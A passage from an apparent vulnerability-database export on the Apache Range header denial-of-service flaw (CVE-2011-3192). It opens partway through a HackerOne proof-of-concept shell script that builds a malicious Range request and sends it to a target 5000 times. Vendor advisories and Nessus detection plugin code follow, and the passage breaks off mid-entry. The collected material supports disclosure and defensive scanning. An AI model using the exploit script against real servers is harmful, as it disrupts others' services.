,5-763,5-764,5-765,5-766,5-767,5-768,5-769,5-770,5-771,5-772,5-773,5-774,5-775,5-776,5-777,5-778,5-779,5-780,5-781,5-782,5-783,5-784,5-785,5-786,5-787,5-788,5-789,5-790,5-791,5-792,5-793,5-794,5-795,5-796,5-797,5-798,5-799,5-800,5-801,5-802,5-803,5-804,5-805,5-806,5-807,5-808,5-809,5-810,5-811,5-812,5-813,5-814,5-815,5-816,5-817,5-818,5-819,5-820,5-821,5-822,5-823,5-824,5-825,5-826,5-827,5-828,5-829,5-830,5-831,5-832,5-833,5-834,5-835,5-836,5-837,5-838,5-839,5-840,5-841,5-842,5-843,5-844,5-845,5-846,5-847,5-848,5-849,5-850,5-851,5-852,5-853,5-854,5-855,5-856,5-857,5-858,5-859,5-860,5-861,5-862,5-863,5-864,5-865,5-866,5-867,5-868,5-869,5-870,5-871,5-872,5-873,5-874,5-875,5-876,5-877,5-878,5-879,5-880,5-881,5-882,5-883,5-884,5-885,5-886,5-887,5-888,5-889,5-890,5-891,5-892,5-893,5-894,5-895,5-896,5-897,5-898,5-899,5-900,5-901,5-902,5-903,5-904,5-905,5-906,5-907,5-908,5-909,5-910,5-911,5-912,5-913,5-914,5-915,5-916,5-917,5-918,5-919,5-920,5-921,5-922,5-923,5-924,5-925,5-926,5-927,5-928,5-929,5-930,5-931,5-932,5-933,5-934,5-935,5-936,5-937,5-938,5-939,5-940,5-941,5-942,5-943,5-944,5-945,5-946,5-947,5-948,5-949,5-950,5-951,5-952,5-953,5-954,5-955,5-956,5-957,5-958,5-959,5-960,5-961,5-962,5-963,5-964,5-965,5-966,5-967,5-968,5-969,5-970,5-971,5-972,5-973,5-974,5-975,5-976,5-977,5-978,5-979,5-980,5-981,5-982,5-983,5-984,5-985,5-986,5-987,5-988,5-989,5-990,5-991,5-992,5-993,5-994,5-995,5-996,5-997,5-998,5-999,5-1000,5-1001,5-1002,5-1003,5-1004,5-1005,5-1006,5-1007,5-1008,5-1009,5-1010,5-1011,5-1012,5-1013,5-1014,5-1015,5-1016,5-1017,5-1018,5-1019,5-1020,5-1021,5-1022,5-1023,5-1024,5-1025,5-1026,5-1027,5-1028,5-1029,5-1030,5-1031,5-1032,5-1033,5-1034,5-1035,5-1036,5-1037,5-1038,5-1039,5-1040,5-1041,5-1042,5-1043,5-1044,5-1045,5-1046,5-1047,5-1048,5-1049,5-1050,5-1051,5-1052,5-1053,5-1054,5-1055,5-1056,5-1057,5-1058,5-1059,5-1060,5-1061,5-1062,5-1063,5-1064,5-1065,5-1066,5-1067,5-1068,5-1069,5-1070,5-1071,5-1072,5-1073,5-1074,5-1075,5-1076,5-1077,5-1078,5-1079,5-1080,5-1081,5-1082,5-1083,5-1084,5-1085,5-1086,5-1087,5-1088,5-1089,5-1090,5-1091,5-1092,5-1093,5-1094,5-1095,5-1096,5-1097,5-1098,5-1099,5-1100,5-1101,5-1102,5-1103,5-1104,5-1105,5-1106,5-1107,5-1108,5-1109,5-1110,5-1111,5-1112,5-1113,5-1114,5-1115,5-1116,5-1117,5-1118,5-1119,5-1120,5-1121,5-1122,5-1123,5-1124,5-1125,5-1126,5-1127,5-1128,5-1129,5-1130,5-1131,5-1132,5-1133,5-1134,5-1135,5-1136,5-1137,5-1138,5-1139,5-1140,5-1141,5-1142,5-1143,5-1144,5-1145,5-1146,5-1147,5-1148,5-1149,5-1150,5-1151,5-1152,5-1153,5-1154,5-1155,5-1156,5-1157,5-1158,5-1159,5-1160,5-1161,5-1162,5-1163,5-1164,5-1165,5-1166,5-1167,5-1168,5-1169,5-1170,5-1171,5-1172,5-1173,5-1174,5-1175,5-1176,5-1177,5-1178,5-1179,5-1180,5-1181,5-1182,5-1183,5-1184,5-1185,5-1186,5-1187,5-1188,5-1189,5-1190,5-1191,5-1192,5-1193,5-1194,5-1195,5-1196,5-1197,5-1198,5-1199,5-1200,5-1201,5-1202,5-1203,5-1204,5-1205,5-1206,5-1207,5-1208,5-1209,5-1210,5-1211,5-1212,5-1213,5-1214,5-1215,5-1216,5-1217,5-1218,5-1219,5-1220,5-1221,5-1222,5-1223,5-1224,5-1225,5-1226,5-1227,5-1228,5-1229,5-1230,5-1231,5-1232,5-1233,5-1234,5-1235,5-1236,5-1237,5-1238,5-1239,5-1240,5-1241,5-1242,5-1243,5-1244,5-1245,5-1246,5-1247,5-1248,5-1249,5-1250,5-1251,5-1252,5-1253,5-1254,5-1255,5-1256,5-1257,5-1258,5-1259,5-1260,5-1261,5-1262,5-1263,5-1264,5-1265,5-1266,5-1267,5-1268,5-1269,5-1270,5-1271,5-1272,5-1273,5-1274,5-1275,5-1276,5-1277,5-1278,5-1279,5-1280,5-1281,5-1282,5-1283,5-1284,5-1285,5-1286,5-1287,5-1288,5-1289,5-1290,5-1291,5-1292,5-1293,5-1294,5-1295,5-1296,5-1297,5-1298,5-1299'\r\n\r\necho \"+ -- --=[Constructing buffer...\"\r\necho \"GET / HTTP/1.1\" > /tmp/buf\r\necho \"Host: $TARGET\" >> /tmp/buf \r\necho $BUFFER >> /tmp/buf\r\necho 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0' >> /tmp/buf\r\necho 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' >> /tmp/buf\r\necho 'Accept-Language: en-US,en;q=0.5' >> /tmp/buf\r\necho 'Accept-Encoding: gzip, deflate' >> /tmp/buf\r\necho 'Connection: keep-alive' >> /tmp/buf\r\necho \"\" >> /tmp/buf \r\nsleep 1 \r\ncat /tmp/buf #DEBUG ONLY\r\nsleep 1\r\n\r\necho \"+ -- --=[Sending exploit...\"\r\necho \"\"\r\nsleep 3\r\n\r\nfor a in {1..5000}; \r\ndo \r\n\tcat /tmp/buf | $CMD $TARGET $PORT; \r\n\tcat /tmp/buf\r\n\techo \"Request: $a\"\r\ndone\r\n\r\nrm -f /tmp/buf\r\necho \"+ -- --=[Done!\"", "modified": "2016-01-01T21:56:22", "published": "2015-09-14T22:55:12", "id": "H1:88904", "href": "https://hackerone.com/reports/88904", "type": "hackerone", "title": "ownCloud: Apache Range Header Denial of Service Attack (Confirmed PoC)", "cvss": {"score": 0.0, "vector": "NONE"}}], "jvn": [{"lastseen": "2019-05-29T17:21:40", "bulletinFamily": "info", "description": "\n ## Description\n\nGIGAPOD file servers (Appliance model and Software model) from TripodWorks CO.,LTD. provide two web interfaces. First, a user web interface via ports 80/443, and a second, an administrative web interface via port 8001. The administrative web interface uses a version of the Apache HTTP server which contains a flaw in handling HTTP requests ([CVE-2011-3192](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192>)). As a result, GIGAPOD contains a denial-of-service (DoS) vulnerability.\n\n ## Impact\n\nA remote attacker may be able to cause a denial-of-service (DoS).\n\n ## Solution\n\n**Update the software** \nApply the appropriate update according to the information provided by the developer. \n\n\n ## Products Affected\n\n * GIGAPOD OFFICEHARD Appliance model versions 3.04.03 and earlier\n * GIGAPOD 2010 / GIGAPOD 3 Appliance model versions 3.01.02 and earlier\n * GIGAPOD 2010 / GIGAPOD 3 Software model versions 3.01.02 and earlier\n", "modified": "2014-10-16T00:00:00", "published": "2014-10-16T00:00:00", "id": "JVN:23809730", "href": "http://jvn.jp/en/jp/JVN23809730/index.html", "title": "JVN#23809730: GIGAPOD vulnerable to denial-of-service (DoS)", "type": "jvn", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "nessus": [{"lastseen": "2019-11-01T02:13:52", "bulletinFamily": "scanner", "description": "The Apache HTTP Server is a popular web server.\n\nA flaw was found in the way the Apache HTTP Server handled Range HTTP\nheaders. A remote attacker could use this flaw to cause httpd to use\nan excessive amount of memory and CPU time via HTTP requests with a\nspecially crafted Range header. (CVE-2011-3192)\n\nAll httpd users should upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.", "modified": "2019-11-02T00:00:00", "id": "ALA_ALAS-2011-1.NASL", "href": "https://www.tenable.com/plugins/nessus/78262", "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : httpd (ALAS-2011-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2011-1.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78262);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2011-3192\");\n script_xref(name:\"ALAS\", value:\"2011-1\");\n script_xref(name:\"RHSA\", value:\"2011:1245\");\n\n script_name(english:\"Amazon Linux AMI : httpd (ALAS-2011-1)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Apache HTTP Server is a popular web server.\n\nA flaw was found in the way the Apache HTTP Server handled Range HTTP\nheaders. A remote attacker could use this flaw to cause httpd to use\nan excessive amount of memory and CPU time via HTTP requests with a\nspecially crafted Range header. (CVE-2011-3192)\n\nAll httpd users should upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2011-1.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update httpd' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-devel-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.21-1.18.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-01T02:26:15", "bulletinFamily": "scanner", "description": "The byte-range filter in the Apache HTTP Server 1.3.x, 2.0.x through\n2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a\ndenial-of-service (memory and CPU consumption) using a Range header\nthat expresses multiple overlapping ranges.\n\nWhen this vulnerability is exploited, the httpd process consumes all\navailable CPU cycles. As a result of CPU starvation, the Configuration\nutility, SSH sessions, and other userland processes may appear\nextremely slow or completely unresponsive. On BIG-IP systems, if the\nsystem hardware watchdog timer is not updated for more than 10\nseconds, the hardware watchdog restarts the system. (CVE-2011-3192)\n\nImpact\n\nThe performance of userland processes may be severely impaired, and\nthe system may eventually reboot.", "modified": "2019-11-02T00:00:00", "id": "F5_BIGIP_SOL13114.NASL", "href": "https://www.tenable.com/plugins/nessus/78131", "published": "2014-10-10T00:00:00", "title": "F5 Networks BIG-IP : Apache Range header vulnerability (K13114)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K13114.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78131);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/10/25 13:36:06\");\n\n script_cve_id(\"CVE-2011-3192\");\n script_bugtraq_id(49303);\n\n script_name(english:\"F5 Networks BIG-IP : Apache Range header vulnerability (K13114)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The byte-range filter in the Apache HTTP Server 1.3.x, 2.0.x through\n2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a\ndenial-of-service (memory and CPU consumption) using a Range header\nthat expresses multiple overlapping ranges.\n\nWhen this vulnerability is exploited, the httpd process consumes all\navailable CPU cycles. As a result of CPU starvation, the Configuration\nutility, SSH sessions, and other userland processes may appear\nextremely slow or completely unresponsive. On BIG-IP systems, if the\nsystem hardware watchdog timer is not updated for more than 10\nseconds, the hardware watchdog restarts the system. (CVE-2011-3192)\n\nImpact\n\nThe performance of userland processes may be severely impaired, and\nthe system may eventually reboot.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K13114\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K13114.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/08/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K13114\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"10.1.0-10.2.2\",\"11.0.0\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"9.2.0-9.4.8\",\"10.0.0-10.2.2\",\"11.0.0\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.0.0\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"11.0.0HF1\",\"11.1.0\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"9.2.2-9.4.8\",\"10.0.0-10.2.2\",\"11.0.0\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"9.2.2-9.4.8\",\"10.0.0-10.2.2\",\"11.0.0\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"9.0.0-9.4.8\",\"10.0.0-10.2.2\",\"11.0.0\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"9.4.0-9.4.8\",\"10.0.0-10.2.2\",\"11.0.0\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"9.4.0-9.4.8\",\"10.0.0-10.2.2\",\"11.0.0\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"10.0.0-10.2.2\",\"11.0.0\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-03T12:17:41", "bulletinFamily": "scanner", "description": "This update fixes a remote denial of service bug (memory exhaustion)\nin the Apache 2 HTTP server, that could be triggered by remote\nattackers using multiple overlapping Request Ranges . (CVE-2011-3192)", "modified": "2019-11-02T00:00:00", "id": "SUSE_11_4_APACHE2-110831.NASL", "href": "https://www.tenable.com/plugins/nessus/75786", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : apache2 (openSUSE-SU-2011:0993-1)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-5089.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75786);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/10/25 13:36:42\");\n\n script_cve_id(\"CVE-2011-3192\");\n script_bugtraq_id(49303);\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-SU-2011:0993-1)\");\n script_summary(english:\"Check for the apache2-5089 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a remote denial of service bug (memory exhaustion)\nin the Apache 2 HTTP server, that could be triggered by remote\nattackers using multiple overlapping Request Ranges . (CVE-2011-3192)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=713966\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-09/msg00002.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-certificates\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-debuginfo-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-debugsource-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-devel-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-example-certificates-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-example-pages-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-itk-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-itk-debuginfo-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-prefork-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-prefork-debuginfo-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-utils-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-utils-debuginfo-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-worker-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-worker-debuginfo-2.2.17-4.7.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-01T02:13:51", "bulletinFamily": "scanner", "description": "The MITRE CVE database describes CVE-2011-3192 as :\n\nThe byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through\n2.0.64, 